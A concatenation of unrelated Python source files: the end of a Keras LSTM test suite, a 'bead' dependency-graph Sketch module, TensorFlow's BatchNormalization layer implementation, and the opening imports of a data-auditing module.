model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
run_eagerly=testing_utils.should_run_eagerly())
inputs = np.random.random((num_samples, timesteps, embedding_dim))
initial_state = [np.random.random((num_samples, units))
for _ in range(num_states)]
targets = np.random.random((num_samples, units))
model.train_on_batch([inputs] + initial_state, targets)
def test_return_state(self):
num_states = 2
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
inputs = keras.Input(batch_shape=(num_samples, timesteps, embedding_dim))
layer = keras.layers.LSTM(units, return_state=True, stateful=True)
outputs = layer(inputs)
state = outputs[1:]
assert len(state) == num_states
model = keras.models.Model(inputs, state[0])
inputs = np.random.random((num_samples, timesteps, embedding_dim))
state = model.predict(inputs)
self.assertAllClose(keras.backend.eval(layer.states[0]), state, atol=1e-4)
def test_state_reuse(self):
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
inputs = keras.Input(batch_shape=(num_samples, timesteps, embedding_dim))
layer = keras.layers.LSTM(units, return_state=True, return_sequences=True)
outputs = layer(inputs)
output, state = outputs[0], outputs[1:]
output = keras.layers.LSTM(units)(output, initial_state=state)
model = keras.models.Model(inputs, output)
inputs = np.random.random((num_samples, timesteps, embedding_dim))
outputs = model.predict(inputs)
def test_initial_states_as_other_inputs(self):
timesteps = 3
embedding_dim = 4
units = 3
num_samples = 2
num_states = 2
layer_class = keras.layers.LSTM
# Test with Keras tensor
main_inputs = keras.Input((timesteps, embedding_dim))
initial_state = [keras.Input((units,)) for _ in range(num_states)]
inputs = [main_inputs] + initial_state
layer = layer_class(units)
output = layer(inputs)
self.assertTrue(
any(initial_state[0] is t
for t in layer._inbound_nodes[0].input_tensors))
model = keras.models.Model(inputs, output)
model.compile(
loss='categorical_crossentropy',
optimizer=adam.AdamOptimizer(),
run_eagerly=testing_utils.should_run_eagerly())
main_inputs = np.random.random((num_samples, timesteps, embedding_dim))
initial_state = [np.random.random((num_samples, units))
for _ in range(num_states)]
targets = np.random.random((num_samples, units))
model.train_on_batch([main_inputs] + initial_state, targets)
def test_regularizers_LSTM(self):
embedding_dim = 4
layer_class = keras.layers.LSTM
layer = layer_class(
5,
return_sequences=False,
weights=None,
input_shape=(None, embedding_dim),
kernel_regularizer=keras.regularizers.l1(0.01),
recurrent_regularizer=keras.regularizers.l1(0.01),
bias_regularizer='l2',
activity_regularizer='l1')
layer.build((None, None, 2))
self.assertEqual(len(layer.losses), 3)
x = keras.backend.variable(np.ones((2, 3, 2)))
layer(x)
if context.executing_eagerly():
self.assertEqual(len(layer.losses), 4)
else:
self.assertEqual(len(layer.get_losses_for(x)), 1)
@test.disable_with_predicate(
pred=test.is_built_with_rocm,
skip_message='Skipping as ROCm MIOpen does not support padded input.')
def test_statefulness_LSTM(self):
num_samples = 2
timesteps = 3
embedding_dim = 4
units = 2
layer_class = keras.layers.LSTM
model = keras.models.Sequential()
model.add(
keras.layers.Embedding(
4,
embedding_dim,
mask_zero=True,
input_length=timesteps,
batch_input_shape=(num_samples, timesteps)))
layer = layer_class(
units, return_sequences=False, stateful=True, weights=None)
model.add(layer)
model.compile(
optimizer=gradient_descent.GradientDescentOptimizer(0.01),
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
out1 = model.predict(np.ones((num_samples, timesteps)))
self.assertEqual(out1.shape, (num_samples, units))
# train once so that the states change
model.train_on_batch(
np.ones((num_samples, timesteps)), np.ones((num_samples, units)))
out2 = model.predict(np.ones((num_samples, timesteps)))
# if the state is not reset, output should be different
self.assertNotEqual(out1.max(), out2.max())
# check that output changes after states are reset
# (even though the model itself didn't change)
layer.reset_states()
out3 = model.predict(np.ones((num_samples, timesteps)))
self.assertNotEqual(out2.max(), out3.max())
# check that container-level reset_states() works
model.reset_states()
out4 = model.predict(np.ones((num_samples, timesteps)))
self.assertAllClose(out3, out4, atol=1e-5)
# check that the call to `predict` updated the states
out5 = model.predict(np.ones((num_samples, timesteps)))
self.assertNotEqual(out4.max(), out5.max())
# Check masking
layer.reset_states()
left_padded_input = np.ones((num_samples, timesteps))
left_padded_input[0, :1] = 0
left_padded_input[1, :2] = 0
out6 = model.predict(left_padded_input)
layer.reset_states()
right_padded_input = np.ones((num_samples, timesteps))
right_padded_input[0, -1:] = 0
right_padded_input[1, -2:] = 0
out7 = model.predict(right_padded_input)
self.assertAllClose(out7, out6, atol=1e-5)
if __name__ == '__main__':
test.main()
|
|
import itertools
from typing import Set, Dict, List, Tuple, Sequence, Iterable
import attr
from cached_property import cached_property
from bead.tech.timestamp import EPOCH_STR
from .freshness import UP_TO_DATE, OUT_OF_DATE
from .dummy import Dummy
from .cluster import Cluster, create_cluster_index
from .io import read_beads, write_beads
from . import graphviz
from .graph import (
Edge,
Ref,
generate_input_edges,
group_by_src,
group_by_dest,
toposort,
closure,
bead_index_from_edges,
refs_from_beads,
refs_from_edges,
)
@attr.s(frozen=True, auto_attribs=True)
class Sketch:
beads: Tuple[Dummy, ...]
edges: Tuple[Edge, ...]
def __attrs_post_init__(self):
assert refs_from_edges(self.edges) - refs_from_beads(self.beads) == set()
@classmethod
def from_beads(cls, beads: Sequence[Dummy]):
bead_index = Ref.index_for(beads)
edges = tuple(
itertools.chain.from_iterable(
generate_input_edges(bead_index, bead)
for bead in beads))
return cls(tuple(bead_index.values()), edges)
@classmethod
def from_edges(cls, edges: Sequence[Edge]):
beads = bead_index_from_edges(edges).values()
return cls(tuple(beads), tuple(edges))
@classmethod
def from_file(cls, file_name):
beads = read_beads(file_name)
return cls.from_beads(beads)
def to_file(self, file_name):
write_beads(file_name, self.beads)
@cached_property
def cluster_by_name(self) -> Dict[str, Cluster]:
return create_cluster_index(self.beads)
@cached_property
def clusters(self):
return tuple(self.cluster_by_name.values())
def color_beads(self):
color_beads(self)
def as_dot(self):
return plot_clusters_as_dot(self)
def drop_deleted_inputs(self) -> "Sketch":
return drop_deleted_inputs(self)
def simplify(sketch: Sketch) -> Sketch:
"""
Remove unreferenced clusters and beads.
Makes a new instance
"""
raise NotImplementedError
def heads_of(sketch: Sketch) -> Sketch:
"""
Keep only cluster heads and their inputs.
Makes a new instance
"""
head_by_ref = {c.head.ref: c.head for c in sketch.clusters}
head_edges = tuple(e for e in sketch.edges if e.dest_ref in head_by_ref)
src_by_ref = {e.src_ref: e.src for e in head_edges}
heads = {**head_by_ref, **src_by_ref}.values()
return Sketch(beads=tuple(heads), edges=head_edges)
def add_final_sink_to(sketch: Sketch) -> Tuple[Sketch, Dummy]:
"""
Add a new node, and edges from all nodes.
This makes a DAG fully connected and the new node a sink node.
The added sink node is special (guaranteed to have a unique name, freshness is UP_TO_DATE).
Returns the extended Sketch and the new sink node.
Makes a new instance
"""
sink_name = '*' * (1 + max((len(bead.name) for bead in sketch.beads), default=0))
sink = Dummy(
name=sink_name,
content_id=sink_name,
kind=sink_name,
freeze_time_str='SINK',
freshness=UP_TO_DATE
)
sink_edges = (Edge(src, sink) for src in sketch.beads)
return (
Sketch(
beads=sketch.beads + tuple([sink]),
edges=sketch.edges + tuple(sink_edges)
),
sink
)
def set_sources(sketch: Sketch, cluster_names: List[str]) -> Sketch:
"""
Drop all clusters, that are not reachable from the named clusters.
Makes a new instance
"""
cluster_filter = ClusterFilter(sketch)
edges = cluster_filter.get_encoded_edges()
root_refs = cluster_filter.get_encoded_refs(cluster_names)
cluster_refs_to_keep = closure(root_refs, group_by_src(edges))
return cluster_filter.get_filtered_by_refs(cluster_refs_to_keep)
def set_sinks(sketch: Sketch, cluster_names: List[str]) -> Sketch:
"""
Drop all clusters, that do not lead to any of the named clusters.
Makes a new instance
"""
cluster_filter = ClusterFilter(sketch)
edges = cluster_filter.get_encoded_edges()
edges = [e.reversed() for e in edges]
root_refs = cluster_filter.get_encoded_refs(cluster_names)
cluster_refs_to_keep = closure(root_refs, group_by_src(edges))
return cluster_filter.get_filtered_by_refs(cluster_refs_to_keep)
class ClusterFilter:
def __init__(self, sketch):
self.sketch = sketch
self.dummy_by_name = {
name: Dummy(
name=name,
content_id=name,
kind=name,
freeze_time_str=EPOCH_STR,
)
for name in sketch.cluster_by_name
}
def get_encoded_edges(self) -> Sequence[Edge]:
src_dest_pairs = self.convert_to_name_pairs(self.sketch.edges)
return [
Edge(
self.dummy_by_name[src],
self.dummy_by_name[dest])
for src, dest in src_dest_pairs
]
def get_encoded_refs(self, bead_names: Iterable[str]) -> List[Ref]:
return [
self.dummy_by_name[name].ref
for name in sorted(set(bead_names))
if name in self.dummy_by_name
]
def get_filtered_by_refs(self, encoded_refs) -> Sketch:
src_dest_pairs = self.convert_to_name_pairs(self.sketch.edges)
clusters_to_keep = {r.name for r in encoded_refs}
cluster_edges_to_keep = {
(src, dest)
for src, dest in src_dest_pairs
if src in clusters_to_keep and dest in clusters_to_keep
}
encoded_edges = [
Edge(
self.dummy_by_name[src],
self.dummy_by_name[dest],
)
for src, dest in cluster_edges_to_keep
]
return self.get_filtered_by_edges(encoded_edges)
def get_filtered_by_edges(self, encoded_edges: Iterable[Edge]) -> Sketch:
src_dest_pairs = self.convert_to_name_pairs(encoded_edges)
bead_names = {src for src, _ in src_dest_pairs} | {dest for _, dest in src_dest_pairs}
assert bead_names - set(self.dummy_by_name) == set()
beads = tuple(b for b in self.sketch.beads if b.name in bead_names)
edges = tuple(e for e in self.sketch.edges if (e.src.name, e.dest.name) in src_dest_pairs)
return Sketch(beads, edges).drop_deleted_inputs()
def convert_to_name_pairs(self, edges: Iterable[Edge]) -> Set[Tuple[str, str]]:
return {(e.src.name, e.dest.name) for e in edges}
def drop_before(sketch: Sketch, timestamp) -> Sketch:
"""
Keep only beads, that are after the given timestamp.
Makes a new instance
"""
raise NotImplementedError
def drop_after(sketch: Sketch, timestamp) -> Sketch:
"""
Keep only beads, that are before the timestamp.
Makes a new instance
"""
raise NotImplementedError
def plot_clusters_as_dot(sketch: Sketch):
"""
Generate GraphViz .dot file content, which describe the connections between beads
and their up-to-date status.
"""
formatted_bead_clusters = '\n\n'.join(c.as_dot for c in sketch.clusters)
graphviz_context = graphviz.Context()
def format_inputs():
def edges_as_dot():
for edge in sketch.edges:
is_auxiliary_edge = (
edge.dest.freshness not in (OUT_OF_DATE, UP_TO_DATE))
yield graphviz_context.dot_edge(edge.src, edge.dest, edge.label, is_auxiliary_edge)
return '\n'.join(edges_as_dot())
return graphviz.DOT_GRAPH_TEMPLATE.format(
bead_clusters=formatted_bead_clusters,
bead_inputs=format_inputs())
def color_beads(sketch: Sketch) -> bool:
"""
Assign up-to-dateness status (freshness) to beads.
"""
heads, sink = add_final_sink_to(heads_of(sketch))
head_eval_order = toposort(heads.edges)
if not head_eval_order: # empty
return True
assert head_eval_order[-1] == sink
for cluster in sketch.clusters:
cluster.reset_freshness()
# downgrade UP_TO_DATE freshness if has a non UP_TO_DATE input
edges_by_dest = group_by_dest(heads.edges)
for cluster_head in head_eval_order:
if cluster_head.freshness is UP_TO_DATE:
if any(e.src.freshness is not UP_TO_DATE for e in edges_by_dest[cluster_head.ref]):
cluster_head.set_freshness(OUT_OF_DATE)
return sink.freshness is UP_TO_DATE
def drop_deleted_inputs(sketch: Sketch) -> Sketch:
edges_as_refs = {(edge.src_ref, edge.dest_ref) for edge in sketch.edges}
beads = []
for bead in sketch.beads:
inputs_to_keep = []
for input in bead.inputs:
input_ref = Ref.from_bead_input(bead, input)
if (input_ref, bead.ref) in edges_as_refs:
inputs_to_keep.append(input)
beads.append(attr.evolve(bead, inputs=inputs_to_keep))
return Sketch.from_beads(beads)
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
# pylint: disable=unused-import,g-bad-import-order
"""Contains the normalization layer classes and their functional aliases.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import six
from six.moves import xrange # pylint: disable=redefined-builtin
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.training import moving_averages
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import variables
from tensorflow.python.layers import base
from tensorflow.python.layers import utils
_FUSED_DEFAULT = os.getenv('TF_DEFAULT_USES_FUSED_BATCH_NORM',
'').lower() in ('true', 't', '1')
class BatchNormalization(base.Layer):
"""Batch Normalization layer from http://arxiv.org/abs/1502.03167.
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Arguments:
axis: Integer, the axis that should be normalized (typically the features
axis). For instance, after a `Conv2D` layer with
`data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
momentum: Momentum for the moving average.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
moving_mean_initializer: Initializer for the moving mean.
moving_variance_initializer: Initializer for the moving variance.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: An optional projection function to be applied to the `beta`
weight after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
gamma_constraint: An optional projection function to be applied to the
`gamma` weight after being updated by an `Optimizer`.
renorm: Whether to use Batch Renormalization
(https://arxiv.org/abs/1702.03275). This adds extra variables during
training. The inference is the same for either value of this parameter.
renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
scalar `Tensors` used to clip the renorm correction. The correction
`(r, d)` is used as `corrected_value = normalized_value * r + d`, with
`r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
dmax are set to inf, 0, inf, respectively.
renorm_momentum: Momentum used to update the moving means and standard
deviations with renorm. Unlike `momentum`, this affects training
and should be neither too small (which would add noise) nor too large
(which would give stale estimates). Note that `momentum` is still applied
to get the means and variances for inference.
fused: if `True`, use a faster, fused implementation if possible.
If `None`, use the system recommended implementation.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
name: A string, the name of the layer.
"""
def __init__(self,
axis=-1,
momentum=0.99,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer=init_ops.zeros_initializer(),
gamma_initializer=init_ops.ones_initializer(),
moving_mean_initializer=init_ops.zeros_initializer(),
moving_variance_initializer=init_ops.ones_initializer(),
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
renorm=False,
renorm_clipping=None,
renorm_momentum=0.99,
fused=None,
trainable=True,
name=None,
**kwargs):
super(BatchNormalization, self).__init__(
name=name, trainable=trainable, **kwargs)
self.axis = axis
self.momentum = momentum
self.epsilon = epsilon
self.center = center
self.scale = scale
self.beta_initializer = beta_initializer
self.gamma_initializer = gamma_initializer
self.moving_mean_initializer = moving_mean_initializer
self.moving_variance_initializer = moving_variance_initializer
self.beta_regularizer = beta_regularizer
self.gamma_regularizer = gamma_regularizer
self.beta_constraint = beta_constraint
self.gamma_constraint = gamma_constraint
self.renorm = renorm
# This environment variable is only used during the testing period of fused
# batch norm and will be removed after that.
if fused is None:
fused = _FUSED_DEFAULT
self.fused = fused
self._bessels_correction_test_only = True
if renorm:
renorm_clipping = renorm_clipping or {}
keys = ['rmax', 'rmin', 'dmax']
if set(renorm_clipping) - set(keys):
raise ValueError('renorm_clipping %s contains keys not in %s' %
(renorm_clipping, keys))
self.renorm_clipping = renorm_clipping
self.renorm_momentum = renorm_momentum
def build(self, input_shape):
input_shape = tensor_shape.TensorShape(input_shape)
if not input_shape.ndims:
raise ValueError('Input has undefined rank:', input_shape)
ndim = len(input_shape)
if self.axis < 0:
axis = ndim + self.axis
else:
axis = self.axis
if axis < 0 or axis >= ndim:
raise ValueError('Value of `axis` argument ' + str(self.axis) +
' is out of range for input with rank ' + str(ndim))
if self.fused:
# Currently fused batch norm doesn't support renorm and beta/gamma
# regularizer; and only supports an input tensor of rank 4 and a channel
# dimension on axis 1 and 3.
# TODO(yaozhang): if input is not 4D, reshape it to 4D and reshape the
# output back to its original shape accordingly.
self.fused = not self.renorm and ndim == 4 and axis in [
1, 3
] and self.beta_regularizer is None and self.gamma_regularizer is None
if self.fused:
if axis == 1:
self._data_format = 'NCHW'
else:
self._data_format = 'NHWC'
param_dim = input_shape[axis]
if not param_dim.value:
raise ValueError('Input has undefined `axis` dimension. Input shape: ',
input_shape)
self.input_spec = base.InputSpec(ndim=ndim,
axes={self.axis: param_dim.value})
if self.scale:
self.gamma = self.add_variable(name='gamma',
shape=(param_dim,),
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint,
trainable=True)
else:
self.gamma = None
if self.fused:
self._gamma_const = array_ops.constant(1.0, shape=(param_dim,))
if self.center:
self.beta = self.add_variable(name='beta',
shape=(param_dim,),
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint,
trainable=True)
else:
self.beta = None
if self.fused:
self._beta_const = array_ops.constant(0.0, shape=(param_dim,))
# Disable variable partitioning when creating the moving mean and variance
try:
if self._scope:
partitioner = self._scope.partitioner
self._scope.set_partitioner(None)
else:
partitioner = None
self.moving_mean = self.add_variable(
name='moving_mean',
shape=(param_dim,),
initializer=self.moving_mean_initializer,
trainable=False)
self.moving_variance = self.add_variable(
name='moving_variance',
shape=(param_dim,),
initializer=self.moving_variance_initializer,
trainable=False)
if self.renorm:
# Create variables to maintain the moving mean and standard deviation.
# These are used in training and thus are different from the moving
# averages above. The renorm variables are colocated with moving_mean
# and moving_variance.
# NOTE: below, the outer `with device` block causes the current device
# stack to be cleared. The nested ones use a `lambda` to set the desired
# device and ignore any devices that may be set by the custom getter.
def _renorm_variable(name, shape):
var = self.add_variable(name=name,
shape=shape,
initializer=init_ops.zeros_initializer(),
trainable=False)
return var
with ops.device(None):
with ops.device(lambda _: self.moving_mean.device):
self.renorm_mean = _renorm_variable('renorm_mean', (param_dim,))
self.renorm_mean_weight = _renorm_variable('renorm_mean_weight', ())
# We initialize renorm_stddev to 0, and maintain the (0-initialized)
# renorm_stddev_weight. This allows us to (1) mix the average
# stddev with the minibatch stddev early in training, and (2) compute
# the unbiased average stddev by dividing renorm_stddev by the weight.
with ops.device(lambda _: self.moving_variance.device):
self.renorm_stddev = _renorm_variable('renorm_stddev', (param_dim,))
self.renorm_stddev_weight = _renorm_variable(
'renorm_stddev_weight', ())
finally:
if partitioner:
self._scope.set_partitioner(partitioner)
self.built = True
def _fused_batch_norm(self, inputs, training):
"""Returns the output of fused batch norm."""
beta = self.beta if self.center else self._beta_const
gamma = self.gamma if self.scale else self._gamma_const
def _fused_batch_norm_training():
return nn.fused_batch_norm(
inputs,
gamma,
beta,
epsilon=self.epsilon,
data_format=self._data_format)
def _fused_batch_norm_inference():
return nn.fused_batch_norm(
inputs,
gamma,
beta,
mean=self.moving_mean,
variance=self.moving_variance,
epsilon=self.epsilon,
is_training=False,
data_format=self._data_format)
output, mean, variance = utils.smart_cond(
training, _fused_batch_norm_training, _fused_batch_norm_inference)
if not self._bessels_correction_test_only:
# Remove Bessel's correction to be consistent with non-fused batch norm.
# Note that the variance computed by fused batch norm is
# with Bessel's correction.
sample_size = math_ops.cast(
array_ops.size(inputs) / array_ops.size(variance), variance.dtype)
factor = (sample_size - math_ops.cast(1.0, variance.dtype)) / sample_size
variance *= factor
training_value = utils.constant_value(training)
if training_value is not False:
decay = _smart_select(training, lambda: self.momentum, lambda: 1.)
mean_update = moving_averages.assign_moving_average(
self.moving_mean, mean, decay, zero_debias=False)
variance_update = moving_averages.assign_moving_average(
self.moving_variance, variance, decay, zero_debias=False)
self.add_update(mean_update, inputs=inputs)
self.add_update(variance_update, inputs=inputs)
return output
def _renorm_correction_and_moments(self, mean, variance, training):
"""Returns the correction and update values for renorm."""
stddev = math_ops.sqrt(variance + self.epsilon)
# Compute the average mean and standard deviation, as if they were
# initialized with this batch's moments.
mixed_renorm_mean = (self.renorm_mean +
(1. - self.renorm_mean_weight) * mean)
mixed_renorm_stddev = (self.renorm_stddev +
(1. - self.renorm_stddev_weight) * stddev)
# Compute the corrections for batch renorm.
r = stddev / mixed_renorm_stddev
d = (mean - mixed_renorm_mean) / mixed_renorm_stddev
# Ensure the corrections use pre-update moving averages.
with ops.control_dependencies([r, d]):
mean = array_ops.identity(mean)
stddev = array_ops.identity(stddev)
rmin, rmax, dmax = [self.renorm_clipping.get(key)
for key in ['rmin', 'rmax', 'dmax']]
if rmin is not None:
r = math_ops.maximum(r, rmin)
if rmax is not None:
r = math_ops.minimum(r, rmax)
if dmax is not None:
d = math_ops.maximum(d, -dmax)
d = math_ops.minimum(d, dmax)
# When not training, use r=1, d=0, and decay=1 meaning no updates.
r = _smart_select(training, lambda: r, lambda: array_ops.ones_like(r))
d = _smart_select(training, lambda: d, lambda: array_ops.zeros_like(d))
decay = _smart_select(training, lambda: self.renorm_momentum, lambda: 1.)
def _update_renorm_variable(var, weight, value):
"""Updates a moving average and weight, returns the unbiased value."""
# Update the variables without zero debiasing. The debiasing will be
# accomplished by dividing the exponential moving average by the weight.
# For example, after a single update, the moving average would be
# (1-decay) * value. and the weight will be 1-decay, with their ratio
# giving value.
# Make sure the weight is not updated until before r and d computation.
value = array_ops.identity(value)
with ops.control_dependencies([value]):
weight_value = array_ops.constant(1., dtype=weight.dtype)
new_var = moving_averages.assign_moving_average(
var, value, decay, zero_debias=False)
new_weight = moving_averages.assign_moving_average(
weight, weight_value, decay, zero_debias=False)
return new_var / new_weight
with ops.colocate_with(self.moving_mean):
new_mean = _update_renorm_variable(self.renorm_mean,
self.renorm_mean_weight,
mean)
with ops.colocate_with(self.moving_variance):
new_stddev = _update_renorm_variable(self.renorm_stddev,
self.renorm_stddev_weight,
stddev)
# Make sqrt(moving_variance + epsilon) = new_stddev.
new_variance = math_ops.square(new_stddev) - self.epsilon
return (r, d, new_mean, new_variance)
def call(self, inputs, training=False):
if self.fused:
return self._fused_batch_norm(inputs, training=training)
# First, compute the axes along which to reduce the mean / variance,
# as well as the broadcast shape to be used for all parameters.
input_shape = inputs.get_shape()
ndim = len(input_shape)
reduction_axes = list(range(len(input_shape)))
del reduction_axes[self.axis]
broadcast_shape = [1] * len(input_shape)
broadcast_shape[self.axis] = input_shape[self.axis].value
# Determines whether broadcasting is needed.
needs_broadcasting = (sorted(reduction_axes) != list(range(ndim))[:-1])
scale, offset = self.gamma, self.beta
# Determine a boolean value for `training`: could be True, False, or None.
training_value = utils.constant_value(training)
if training_value is not False:
# Some of the computations here are not necessary when training==False
# but not a constant. However, this makes the code simpler.
mean, variance = nn.moments(inputs, reduction_axes)
mean = _smart_select(training,
lambda: mean,
lambda: self.moving_mean)
variance = _smart_select(training,
lambda: variance,
lambda: self.moving_variance)
if self.renorm:
r, d, new_mean, new_variance = self._renorm_correction_and_moments(
mean, variance, training)
# When training, the normalized values (say, x) will be transformed as
# x * gamma + beta without renorm, and (x * r + d) * gamma + beta
# = x * (r * gamma) + (d * gamma + beta) with renorm.
scale = array_ops.stop_gradient(r, name='renorm_r')
offset = array_ops.stop_gradient(d, name='renorm_d')
if self.gamma is not None:
scale *= self.gamma
offset *= self.gamma
if self.beta is not None:
offset += self.beta
else:
new_mean, new_variance = mean, variance
# Update moving averages when training, and prevent updates otherwise.
decay = _smart_select(training, lambda: self.momentum, lambda: 1.)
mean_update = moving_averages.assign_moving_average(
self.moving_mean, new_mean, decay, zero_debias=False)
variance_update = moving_averages.assign_moving_average(
self.moving_variance, new_variance, decay, zero_debias=False)
self.add_update(mean_update, inputs=inputs)
self.add_update(variance_update, inputs=inputs)
else:
mean, variance = self.moving_mean, self.moving_variance
def _broadcast(v):
if needs_broadcasting and v is not None:
# In this case we must explicitly broadcast all parameters.
return array_ops.reshape(v, broadcast_shape)
return v
return nn.batch_normalization(inputs,
_broadcast(mean),
_broadcast(variance),
_broadcast(offset),
_broadcast(scale),
self.epsilon)
def batch_normalization(inputs,
axis=-1,
momentum=0.99,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer=init_ops.zeros_initializer(),
gamma_initializer=init_ops.ones_initializer(),
moving_mean_initializer=init_ops.zeros_initializer(),
moving_variance_initializer=init_ops.ones_initializer(),
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
training=False,
trainable=True,
name=None,
reuse=None,
renorm=False,
renorm_clipping=None,
renorm_momentum=0.99,
fused=None):
"""Functional interface for the batch normalization layer.
Reference: http://arxiv.org/abs/1502.03167
"Batch Normalization: Accelerating Deep Network Training by Reducing
Internal Covariate Shift"
Sergey Ioffe, Christian Szegedy
Note: when training, the moving_mean and moving_variance need to be updated.
By default the update ops are placed in `tf.GraphKeys.UPDATE_OPS`, so they
need to be added as a dependency to the `train_op`. For example:
```python
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_op = optimizer.minimize(loss)
```
Arguments:
inputs: Tensor input.
axis: Integer, the axis that should be normalized (typically the features
axis). For instance, after a `Convolution2D` layer with
`data_format="channels_first"`, set `axis=1` in `BatchNormalization`.
momentum: Momentum for the moving average.
epsilon: Small float added to variance to avoid dividing by zero.
center: If True, add offset of `beta` to normalized tensor. If False, `beta`
is ignored.
scale: If True, multiply by `gamma`. If False, `gamma` is
not used. When the next layer is linear (also e.g. `nn.relu`), this can be
disabled since the scaling can be done by the next layer.
beta_initializer: Initializer for the beta weight.
gamma_initializer: Initializer for the gamma weight.
moving_mean_initializer: Initializer for the moving mean.
moving_variance_initializer: Initializer for the moving variance.
beta_regularizer: Optional regularizer for the beta weight.
gamma_regularizer: Optional regularizer for the gamma weight.
beta_constraint: An optional projection function to be applied to the `beta`
weight after being updated by an `Optimizer` (e.g. used to implement
norm constraints or value constraints for layer weights). The function
must take as input the unprojected variable and must return the
projected variable (which must have the same shape). Constraints are
not safe to use when doing asynchronous distributed training.
gamma_constraint: An optional projection function to be applied to the
`gamma` weight after being updated by an `Optimizer`.
training: Either a Python boolean, or a TensorFlow boolean scalar tensor
(e.g. a placeholder). Whether to return the output in training mode
(normalized with statistics of the current batch) or in inference mode
(normalized with moving statistics). **NOTE**: make sure to set this
parameter correctly, or else your training/inference will not work
properly.
trainable: Boolean, if `True` also add variables to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
name: String, the name of the layer.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
renorm: Whether to use Batch Renormalization
(https://arxiv.org/abs/1702.03275). This adds extra variables during
training. The inference is the same for either value of this parameter.
renorm_clipping: A dictionary that may map keys 'rmax', 'rmin', 'dmax' to
scalar `Tensors` used to clip the renorm correction. The correction
`(r, d)` is used as `corrected_value = normalized_value * r + d`, with
`r` clipped to [rmin, rmax], and `d` to [-dmax, dmax]. Missing rmax, rmin,
dmax are set to inf, 0, inf, respectively.
renorm_momentum: Momentum used to update the moving means and standard
deviations with renorm. Unlike `momentum`, this affects training
and should be neither too small (which would add noise) nor too large
(which would give stale estimates). Note that `momentum` is still applied
to get the means and variances for inference.
fused: if `True`, use a faster, fused implementation if possible.
If `None`, use the system recommended implementation.
Returns:
Output tensor.
"""
layer = BatchNormalization(
axis=axis,
momentum=momentum,
epsilon=epsilon,
center=center,
scale=scale,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer,
moving_mean_initializer=moving_mean_initializer,
moving_variance_initializer=moving_variance_initializer,
beta_regularizer=beta_regularizer,
gamma_regularizer=gamma_regularizer,
beta_constraint=beta_constraint,
gamma_constraint=gamma_constraint,
renorm=renorm,
renorm_clipping=renorm_clipping,
renorm_momentum=renorm_momentum,
fused=fused,
trainable=trainable,
name=name,
_reuse=reuse,
_scope=name)
return layer.apply(inputs, training=training)
# Aliases
BatchNorm = BatchNormalization
batch_norm = batch_normalization
# Helper function
def _smart_select(pred, fn_then, fn_else):
"""Selects fn_then() or fn_else() based on the value of pred.
The purpose of this function is the same as `utils.smart_cond`. However, at
the moment there is a bug (b/36297356) that seems to kick in only when
`smart_cond` delegates to `tf.cond`, which sometimes results in the training
hanging when using parameter servers. This function will output the result
of `fn_then` or `fn_else` if `pred` is known at graph construction time.
Otherwise, it will use `tf.where` which will result in some redundant work
(both branches will be computed but only one selected). However, the tensors
involved will usually be small (means and variances in batchnorm), so the
cost will be small and will not be incurred at all if `pred` is a constant.
Args:
pred: A boolean scalar `Tensor`.
fn_then: A callable to use when pred==True.
fn_else: A callable to use when pred==False.
Returns:
A `Tensor` whose value is fn_then() or fn_else() based on the value of pred.
"""
pred_value = utils.constant_value(pred)
if pred_value:
return fn_then()
elif pred_value is False:
return fn_else()
t_then = array_ops.expand_dims(fn_then(), 0)
t_else = array_ops.expand_dims(fn_else(), 0)
pred = array_ops.reshape(pred, [1])
result = array_ops.where(pred, t_then, t_else)
return array_ops.squeeze(result, [0])
|
|
""" Cross-object data auditing
Schema validation allows for checking values within a single object.
We also need to perform higher order checking between linked objects.
"""
import logging
import venusian
from past.builtins import basestring
